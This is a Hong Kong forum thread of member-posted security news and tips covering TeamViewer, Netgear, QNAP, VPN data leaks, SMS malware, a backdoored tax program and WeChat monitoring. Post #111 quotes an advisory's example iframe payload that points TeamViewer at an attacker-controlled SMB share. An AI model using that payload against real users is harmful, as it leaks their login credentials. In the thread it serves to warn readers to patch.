| 談天說地主旨 ﹝請按主旨作出回應﹞ 下頁 尾頁 | 寄件者 | 傳送日期
|
| [#122] 電腦/電話保安資訊(不定期更新) 超強黑科技 |
純情小花 正式會員172.xxx.xxx.195 |
2022-10-22 08:24 | |
|
|
|||
| [#121] 電腦/電話保安資訊(不定期更新) |
純情小花 正式會員 172.xxx.xxx.23 |
2022-06-07 21:54 |
| [#120] 電腦/電話保安資訊(不定期更新) |
純情小花 正式會員 172.xxx.xxx.23 |
2022-06-07 21:53 |
| [#119] 電腦/電話保安資訊(不定期更新) |
純情小花 正式會員 172.xxx.xxx.23 |
2022-05-26 02:28 |
| [#118] 電腦/電話保安資訊(不定期更新) apple用家要立即upgrade去 ios 14.8, macos 11.6: https://www.theverge.com/2021/9/13/22672352/apple-spyware-gateway-iphone-software-update-nso-pegasus |
skyliner 正式會員 203.xxx.xxx.206 |
2021-09-14 16:16 |
| [#117] 電腦/電話保安資訊(不定期更新) |
純情小花 正式會員 199.xxx.xxx.217 |
2021-04-16 12:51 |
| [#116] 電腦/電話保安資訊(不定期更新) 好似有一集㗎batman講過:以前真好,只係對住一啲頑皮嘅對手,而家要對住外星人… 小弟以前都係做資訊保安,都想講句:以前真好,裝好antivirus就搞掂!搞到個bcp出嚟做簡直係超人! 而家? 想secure屋企個network都困難... |
H2O 正式會員 114.xxx.xxx.91 |
2021-04-04 23:52 |
| [#115] 電腦/電話保安資訊(不定期更新) |
純情小花 正式會員 199.xxx.xxx.217 |
2021-04-04 19:47 |
| [#114] 電腦/電話保安資訊(不定期更新) . |
r33er 正式會員 61.xxx.xxx.216 |
2021-03-24 02:08 |
| [#113] 電腦/電話保安資訊(不定期更新) |
純情小花 正式會員 199.xxx.xxx.217 |
2021-03-23 22:40 |
| [#112] 電腦/電話保安資訊(不定期更新) |
純情小花 正式會員 199.xxx.xxx.217 |
2021-03-11 09:57 |
| [#111] 電腦/電話保安資訊(不定期更新) Windows版TeamViewer修正咗個保安漏洞,如果用家去咗有問題網頁,個網頁可以自己行TeamViewer再將你現時嘅登入資料傳送畀對方。TeamViewer出咗patches畀version 8-15。 "Windows users of TeamViewer should consider upgrading to one or more patched versions, which include: 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350, and 15.8.3." TeamViewer fixes bug that lets attackers access your PC By Ax Sharma, BleepingComputer, August 7, 2020 12:37 PM “An attacker could embed a malicious iframe in a website with a crafted URL (iframe src='teamviewer10: --play attacker-IPsharefake.tvs') that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,” said Jeffrey Hofmann, a security engineer at Praetorian who discovered the flaw. https://www.bleepingcomputer.com/news/security/teamviewer-fixes-bug-that-lets-attackers-access-your-pc/  The tiny pixel above "Latest Articles" is where the iframe resides, Source: BleepingComputer 最後修改時間: 2020-08-11 02:04:39 |
uncle11 正式會員 61.xxx.xxx.81 |
2020-08-11 02:03 |
| [#110] 電腦/電話保安資訊(不定期更新) 分享下今日做左乜... 一直有大陸牌子 cam, 因為唔係 open standard, 逼住用佢地既cloud service. 一般cam 就算係大陸既, 你可以block左唔比上網, 再vpn返入屋企先睇. 或者經一個 video server 再出. 但如果係一定要用佢雲既就好慘. 所以我既切蔥辦法就係.... 要睇先比佢上網... default drop 左一條由果部 webcam 既 forward rule. 我屋企有智能家居, 係 server set 兩條 comment, 寫 authorized_key 去 router, 要 開 service 就 送 ssh command 過去改寫條 rule 做 accept... 十分鐘後自動封.. 將兩條command 變做家居一個開關制, switch on, 個speaker 會出聲報 camera online. switch off 會報 offline. 咁係街要搵隻衰貓, 就叫siri 開個cam開關.. 之後約半分鐘就會用得到... 用完一係十分鐘自動關, 一係叫 siri 關. 如果你唔需要24小時local錄影, 可以選擇用智能開關用電源控制, 會簡單啲. |
mcdull 正式會員 140.xxx.xxx.208 |
2020-08-05 23:44 |
| [#109] 電腦/電話保安資訊(不定期更新) 專家建議如果仲用緊Netgear呢45款舊router就係時候換咗佢,因為Netgear(2020/07/22)已經唔再為佢哋修補保安漏洞。 If you own one of these 45 Netgear devices, replace it: Kit maker won't patch vulnerable gear despite live proof-of-concept code That's one way of speeding up the tech refresh cycle Gareth Corfield, The Register, Thu 30 Jul 2020 // 11:28 UTC 39 “Netgear has quietly decided not to patch more than 40 home routers to plug a remote code execution vulnerability – despite security researchers having published proof-of-concept exploit code. The vuln was revealed publicly in June by Trend Micro's Zero Day Initiative (ZDI) following six months spent chivvying Netgear behind the scenes to take it seriously. Keen-eyed Reg readers, however, noticed that Netgear quietly declared 45 of the affected products as "outside the security support period" – meaning those items won't be updated to protect them against the vuln.” https://www.theregister.com/2020/07/30/netgear_abandons_45_routers_vuln_patching/ Security Advisory for Multiple Vulnerabilities on Some Routers, Mobile Routers, Modems, Gateways, and Extenders Last Updated:07/20/2020 | Article ID: 000061982 https://kb.netgear.com/000061982/Security-Advisory-for-Multiple-Vulnerabilities-on-Some-Routers-Mobile-Routers-Modems-Gateways-and-Extenders |
uncle11 正式會員 61.xxx.xxx.81 |
2020-07-31 06:38 |
| [#108] 電腦/電話保安資訊(不定期更新) QNAP NAS 2019年尾有個保安漏洞到宜家有六萬幾部機畀人入侵。英國同美國保安機構出咗聯合聲明叫人更新軟件到最新版本,甚至要factory reset完先做。冇資源或者冇知識去做就最基本嘅軟件更新。 QNAP有份文件教專業人士點做,同收緊保安政策,得英文版。 https://www.qnap.com/zh-tw/security-advisory/nas-201911-01 Data-stealing, password-harvesting, backdoor-opening QNAP NAS malware Qsnatch reaches 62,000 infections If you're still using a vulnerable box, you ought to factory reset it before patching Shaun Nichols in San Francisco, The Register, Mon 27 Jul 2020 21:07 UTC By contrast, the late 2019 version has proven far more virulent and dangerous for its victims. What's more, the people behind the software nasty remain at large. "Although the identities and objectives of the malicious cyber actors using QSnatch are currently unknown, the malware is relatively sophisticated," the agencies warned, "and the cyber actors demonstrate an awareness of operational security." https://www.theregister.com/2020/07/27/qnap_attack_warning/ |
uncle11 正式會員 61.xxx.xxx.81 |
2020-07-29 00:46 |
| [#107] 電腦/電話保安資訊(不定期更新) 有公司嘅免費“no-log” VPN服務,因為資料外洩,所以俾人發現其實係log咗好多數據。所以用有audit嘅付費服務會比較有保障。 Several Hong Kong-Based VPN Apps Exposed Their Private User Data Online By Bill Toulas, TechNadu.com, July 16, 2020 A group of seven VPN products that are supposedly “no-log” services has exposed 20 million users by leaving a server unprotected online. All seven of the products come from the same Hong Kong-based developer, Dreamfii HK Limited, which is the reason why they were using the same Elasticsearch server. The exposed VPNs are UFO VPN, FAST VPN, Free VPN, Super VPN, Flash VPN, Secure VPN, and Rabbit VPN. The number of files that were online exceeded a billion and the total data size was about 1.2 TB. The compromised user data includes the following: - Internet activity logs - Names - Email addresses - Passwords in plain text form - IP addresses - Home addresses - Smartphone device models and IDs For “no-log” VPNs, this is way too much data to be collected, so these products’ marketing promises are straight out false. The exposed users are now running the risk of getting scammed, extorted, phished, or even arrested and prosecuted if they accessed websites that are banned in their home countries. https://www.technadu.com/hong-kong-based-vpn-apps-exposed-private-user-data-online/142974/  |
uncle11 正式會員 61.xxx.xxx.81 |
2020-07-17 14:36 |
| [#106] 電腦/電話保安資訊(不定期更新) https://bgr.com/2020/07/03/android-malware-fakespy-steals-text-messages-banking-information/ 小心由假銀行、郵局、速遞發出 SMS 最後修改時間: 2020-07-05 01:09:28 |
純情小花 正式會員 68.xxx.xxx.48 |
2020-07-05 01:08 |
| [#105] 電腦/電話保安資訊(不定期更新) https://unwire.hk/2020/06/26/spyware-hidden-chinese-tax-software/fun-tech 企業要做生意都需要配合政府報稅,而間中也需要使用特定的軟件去完成程序。早前有一家科技公司在中國經營,在處理稅務時被要求安裝一個軟件,後來發現這個軟件存在後門,容許駭客入侵系統。 報導指,這家總部位於英國的跨國科技公司在中國被銀行方面要求安裝一個軟件來處理稅務程序,這個軟件看起來正常,但是經過網絡安全公司 Trustwave 調查後,發現安裝之後兩小時會加入一個後門軟件,稱之爲 GoldenSpy,容許外部攻擊者進入系統並獲得管理員權限,安裝其他軟件或上載數據。而就算刪除稅務軟件,GoldenSpy 也會留下來。 Trustwave 副總裁 Brian Hussey 表示,國際企業在中國經營時要特別小心,如果被要求安裝任何軟件,需要更加謹慎處理。不過他們並不肯定這個攻擊是來自政府還是商業駭客,而他們的客戶是否唯一被針對的對象,抑或所有安裝軟件的公司也會受到威脅則仍然不確定。他們鼓勵所有在中國經營並安裝這個軟件的公司儘快進行檢查。 |
dna_oscar 正式會員 58.xxx.xxx.190 |
2020-06-27 21:51 |
| [#104] 電腦/電話保安資訊(不定期更新) 微信一向唔用. |
呀金 正式會員 221.xxx.xxx.152 |
2020-05-11 17:53 |
| [#103] 電腦/電話保安資訊(不定期更新) https://news.now.com/home/international/player?newsId=390328 【Now新聞台】中國對網絡內容進行審查,除了設立「網絡長城」限制網民瀏覽互聯網,亦對通訊軟件內容進行審查。最新研究發現,擁有10億用戶的通訊軟件微信,會監控非中國用戶的內容。 《華爾街日報》報道,加拿大一項研究發現非中國用戶使用微信時,內容會遭到監控。雖然發布敏感內容時不會像中國用戶般遭到審查,但這些內容會被用來改善及擴大針對內地用戶的敏感內容資料庫,以加強審查中國用戶的言論。 研究由多倫多大學的「公民實驗室」進行,研究人員先將含有敏感內容資料,包括一幅已故諾貝爾和平獎得主劉曉波的漫畫,在非中國用戶間傳送,發現之後這些內容在中國帳號遭到審查,用戶未能收到有關資料。 研究人員指結果顯示,微信會分析非中國用戶所傳送的文件及圖片內容,之後將敏感內容加入針對中國用戶的審查資料庫,提升審查能力。 公民實驗室又表示,現時沒證據顯示騰訊是在中國政府指使下監控非中國微信用戶的內容,但提醒民眾不要以為不是中國用戶便可享受「一App兩制」,內容不會受到中國監控。 《華爾街日報》的記者就今次研究結果向騰訊查詢,但對方未有回應。 有網絡安全專家建議,從事敏感工作的網民使用微信前要三思。 https://citizenlab.ca/2020/05/we-chat-they-watch |
dna_oscar 正式會員 223.xxx.xxx.179 |
2020-05-11 17:32 |
